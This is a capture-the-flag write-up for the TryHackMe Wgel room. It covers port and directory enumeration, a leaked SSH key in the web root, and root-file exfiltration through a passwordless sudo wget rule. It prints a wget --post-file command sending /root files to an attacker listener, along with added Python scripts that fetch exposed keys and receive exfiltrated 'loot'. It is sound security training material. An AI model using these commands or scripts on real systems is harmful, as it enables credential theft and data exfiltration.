TryHackMe: Wgel write-up

In this article we’ll tackle an easy CTF on TryHackMe. We’ll enumerate a Linux box, find a misplaced SSH private key served by the web server, and abuse a sudo rule for a common Linux tool (wget) to read a root-owned file and exfiltrate it.

Link: https://tryhackme.com/room/wgelctf

Difficulty: Easy

Authors: MrSeth6797

First steps and enumeration

Our journey into this CTF challenge begins with a full-port nmap scan (-p-) with version detection to identify the services on the target. The scan revealed two open ports: SSH on port 22 (OpenSSH 7.2p2 Ubuntu 4ubuntu2.8) and HTTP on port 80 (Apache httpd 2.4.18 on Ubuntu). Both versions point at an Ubuntu 16.04 era box:

$ nmap -sV -sT -p- -oN nmap/full-scan.nmap $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-15 15:18 CET
Nmap scan report for 10.10.222.165
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds

The web server appears to host nothing but the default page bundled with the Apache installation. However, a quick GoBuster scan with the directory-list-lowercase-2.3-medium.txt wordlist shows there is more than meets the eye (the scan was stopped once the interesting hit appeared, hence the partial progress line):

$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt | tee gobuster.log

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.165
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/sitemap              (Status: 301) [Size: 316] [--> http://10.10.222.165/sitemap/]
Progress: 62904 / 207644 (30.29%)

There’s an unlinked /sitemap directory. A look at the page source of the default page also reveals an HTML comment hinting at a username:

<!-- Jessie don’t forget to udate the website. -->

The name Jessie is a likely username, worth noting for later. Next, we visited the /sitemap area of the website.

It’s a template from ColorLib, and nothing stood out at first. To dig deeper, I ran GoBuster against /sitemap. The first scan with the medium wordlist didn’t show results, so I switched to dirb’s common.txt, a shorter list that includes dot-prefixed names:

$ gobuster dir -u http://$IP/sitemap -w /usr/share/wordlists/dirb/common.txt | tee gobuster-sitemap.log 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.165/sitemap
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.ssh                 (Status: 301) [Size: 321] [--> http://10.10.222.165/sitemap/.ssh/]
/css                  (Status: 301) [Size: 320] [--> http://10.10.222.165/sitemap/css/]
/fonts                (Status: 301) [Size: 322] [--> http://10.10.222.165/sitemap/fonts/]
/images               (Status: 301) [Size: 323] [--> http://10.10.222.165/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 319] [--> http://10.10.222.165/sitemap/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

There is a very interesting hidden directory called .ssh, and Apache serves a directory listing for it. Inside we find an SSH private key: credentials sitting in the web root, which is the "misplaced credentials" this box is about. We save a copy on our machine, restrict its permissions to owner-only (ssh refuses to use a private key that is readable by other users), and use it with the username jessie to log in to the target. Inside Jessie’s Documents directory we can finally get the user flag.
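As an added example (not code from the original write-up), the following Python script automates the key step above: it downloads the exposed key, sanity-checks that it really is a private key, flags the case where a legacy PEM key is passphrase-protected, and stores it with mode 0600 so ssh will accept it. The filename id_rsa is an assumption (the write-up never names the file in the listing), and the target IP and username are taken from the write-up.

```python
"""Fetch an SSH private key exposed over HTTP and store it safely.

Added example, not part of the original write-up. Assumptions: the key in
/sitemap/.ssh/ is named id_rsa (the listing does not name it); TARGET and
USER come from the write-up.
"""
import stat
import urllib.request
from pathlib import Path

TARGET = "10.10.222.165"
USER = "jessie"
KEY_URL = f"http://{TARGET}/sitemap/.ssh/id_rsa"  # assumed filename

PEM_HEADERS = (
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
)


def classify_key(data: bytes) -> str:
    """Return 'pem', 'encrypted' or 'not-a-key'.

    Detection is by textual markers only. A legacy PEM key protected by a
    passphrase carries a 'Proc-Type: 4,ENCRYPTED' header; an OpenSSH-format
    key stores its cipher inside the base64 blob, so that case is reported
    as 'pem' here and only ssh-keygen -y will reveal a passphrase prompt.
    """
    head = data.lstrip()
    if not head.startswith(PEM_HEADERS):
        return "not-a-key"
    if b"Proc-Type: 4,ENCRYPTED" in data:
        return "encrypted"
    return "pem"


def save_key(data: bytes, path: Path) -> int:
    """Write the key with mode 0600 and return the resulting permission bits."""
    path.write_bytes(data)
    path.chmod(0o600)  # ssh rejects keys readable by group/others
    return stat.S_IMODE(path.stat().st_mode)


def fetch_key(url: str = KEY_URL, dest: Path = Path("jessie_id_rsa")) -> str:
    """Download the key, validate it, store it and return the ssh command to use."""
    data = urllib.request.urlopen(url, timeout=10).read()
    kind = classify_key(data)
    if kind == "not-a-key":
        raise ValueError("downloaded file does not look like a private key")
    save_key(data, dest)
    note = " (passphrase required)" if kind == "encrypted" else ""
    return f"ssh -i {dest} {USER}@{TARGET}{note}"


if __name__ == "__main__":
    print(fetch_key())
```

Run it from your attacking machine; it prints the ssh command to use. If the key turns out to be passphrase-protected you will need that passphrase before the login works.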

Privilege escalation

After gaining access to the system, we proceeded to enumerate its configuration. A quick check with sudo -l revealed a particularly interesting privilege assigned to the user jessie: the system allows jessie to execute wget as root without a password. The preceding (ALL : ALL) ALL line would grant full sudo, but it still requires Jessie’s password, which we never obtained, so the NOPASSWD entry for /usr/bin/wget is the one that matters:

$ sudo -l

Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

We can’t list the /root directory as jessie, but guessing that the root flag is called root_flag.txt (just like the user flag was named user_flag.txt), we can let wget read it for us: running as root, wget can open any file on the box, and --post-file sends that file’s contents as the body of an HTTP POST to a server we control.

First, let’s set up a listener on our attacking machine to receive the request. Netcat is enough for a one-line flag:

$ nc -vlnp 1337

Now, on the target, let’s use the sudo rule to make wget POST the contents of root_flag.txt to our listener:

$ sudo wget --post-file=/root/root_flag.txt http://<Attacker IP>:1337

Netcat prints the raw HTTP request; the flag is the body that follows the blank line after the headers. Because netcat never sends an HTTP response, wget keeps waiting for one, so close the listener with Ctrl-C once the body has arrived. And just like that, we capture the root flag right in our terminal.
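For anything larger than a one-line flag, a proper HTTP receiver is more convenient than netcat: it separates the body from the headers, writes it to disk byte-for-byte, and answers wget so the command exits cleanly instead of hanging. The following Python server is an added example, not code from the original write-up; it listens on port 1337 as the write-up does, and the loot directory name is an assumption. It also includes a helper that recovers the body from a raw request captured with netcat.

```python
"""Receiver for files exfiltrated with `sudo wget --post-file=... http://IP:1337`.

Added example, not part of the original write-up. The output directory
name is an assumption; the port follows the write-up.
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path


def extract_post_body(raw_request: bytes) -> bytes:
    """Return the body of a raw HTTP/1.x request, e.g. one captured with nc.

    Honors Content-Length so trailing bytes do not end up in the file and
    falls back to 'everything after the header block' when it is absent.
    """
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:  # tolerate bare-LF requests
        head, sep, body = raw_request.partition(b"\n\n")
    length = None
    for line in head.split(b"\n"):
        name, _, value = line.strip().partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return body[:length] if length is not None else body


class LootHandler(BaseHTTPRequestHandler):
    out_dir = Path("loot")  # assumed output directory
    received = []  # paths of saved files, in arrival order

    def do_POST(self):
        # wget --post-file always sends Content-Length; read exactly that many bytes.
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        self.out_dir.mkdir(exist_ok=True)
        dest = self.out_dir / f"post_{len(self.received):03d}_{self.client_address[0]}.bin"
        dest.write_bytes(body)  # binary-safe: works for keys, archives, /etc/shadow ...
        type(self).received.append(dest)
        # Reply so wget returns instead of waiting for its read timeout.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep stdout quiet; saved paths are tracked in `received`


def start_receiver(port: int = 1337) -> HTTPServer:
    """Start the receiver in a background thread and return the server."""
    srv = HTTPServer(("0.0.0.0", port), LootHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_receiver(1337)
    print(f"listening on :{srv.server_port}; on the target run:")
    print("  sudo wget --post-file=/root/root_flag.txt http://<Attacker IP>:1337")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        srv.shutdown()
```

Each POST lands in its own file under the loot directory, named by arrival order and source address, so several exfiltrated files from the same box stay separate.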

In the cyber world, coffee is the potion of champions. Support my efforts by offering me a virtual cup through 'Buy Me a Coffee'! Let's unravel the enigmas of CTF challenges and fortify our cyber arsenals together!
